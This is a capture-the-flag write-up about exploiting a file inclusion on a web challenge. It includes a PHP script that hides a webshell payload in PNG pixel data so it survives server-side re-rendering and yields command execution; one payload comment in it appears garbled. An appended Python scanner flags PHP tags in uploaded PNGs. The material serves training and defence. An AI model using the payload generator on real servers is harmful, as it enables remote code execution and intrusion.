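1. The challenge hint is "a makeover" (changing the outward appearance). Looking at the page source, there is an `<a href='download.php?image=` link, which looks like a file inclusion.
2. Uploading an image shows that only PNG is accepted. After a successful upload, downloading the image back shows that its size is different, so it has probably been re-rendered on the server.
3. Use a script for PNG re-rendering to generate a PNG image, then upload it.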
    ```php
    <?php

    /*<?$_GET0;?>*/

    $p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23, 0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae, 0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc, 0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f, 0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c, 0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d, 0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1, 0x66, 0x44, 0x50, 0x33);

    $img = imagecreatetruecolor(32, 32);

    // Write the byte triples from $p as RGB pixels along row 0 of the image
    for ($y = 0; $y < sizeof($p); $y += 3) {
        $r = $p[$y];
        $g = $p[$y+1];
        $b = $p[$y+2];
        $color = imagecolorallocate($img, $r, $g, $b);
        imagesetpixel($img, round($y / 3), 0, $color);
    }

    imagepng($img, '1.png');
    ```

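4. After the upload succeeds, click through to open the page, capture the request, and submit parameters to achieve command execution.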
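A defender-side check for the steps above, as an added example that is not part of the original write-up: it assumes the payload that survives re-rendering shows up as a PHP open tag in the raw chunk bytes of the stored PNG, and scans for it after validating each chunk. `build_png`, `scan_png` and both sample images are constructed for illustration.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Open tags PHP always honours; a bare "<?" is skipped as too noisy in compressed data.
MARKERS = (b"<?php", b"<?=")

def _chunk(ctype, data):
    body = ctype + data
    return struct.pack(">I", len(data)) + body + struct.pack(">I", zlib.crc32(body))

def build_png(row_rgb):
    """Constructed sample: one-row RGB PNG; level-0 deflate stores the row verbatim."""
    ihdr = struct.pack(">IIBBBBB", len(row_rgb) // 3, 1, 8, 2, 0, 0, 0)
    idat = zlib.compress(b"\x00" + row_rgb, 0)  # filter byte 0 + pixel bytes
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")

def _hits(where, base, data):
    return [(where, base + data.find(m), m.decode()) for m in MARKERS if m in data]

def scan_png(blob):
    """Return (location, file offset, marker) for PHP open tags in chunk data or after IEND."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    findings, pos = [], len(PNG_SIG)
    while pos + 12 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        end = pos + 12 + length
        if end > len(blob):
            raise ValueError("truncated chunk")
        data = blob[pos + 8:end - 4]
        if zlib.crc32(ctype + data) != struct.unpack(">I", blob[end - 4:end])[0]:
            raise ValueError("bad chunk CRC")
        findings += _hits(ctype.decode("latin-1"), pos + 8, data)
        pos = end
        if ctype == b"IEND":
            break
    return findings + _hits("trailing", pos, blob[pos:])

# Constructed inputs: a marker string in the pixel row, and an all-black row.
SUSPICIOUS = build_png(b"<?=CONSTRUCTED_MARKER?>".ljust(96, b"\x00"))
CLEAN = build_png(bytes(96))

if __name__ == "__main__":
    print(scan_png(SUSPICIOUS), scan_png(CLEAN))
```

A hit is a reason to reject or quarantine the upload; the check complements, and does not replace, serving uploaded files as data instead of passing them to an include.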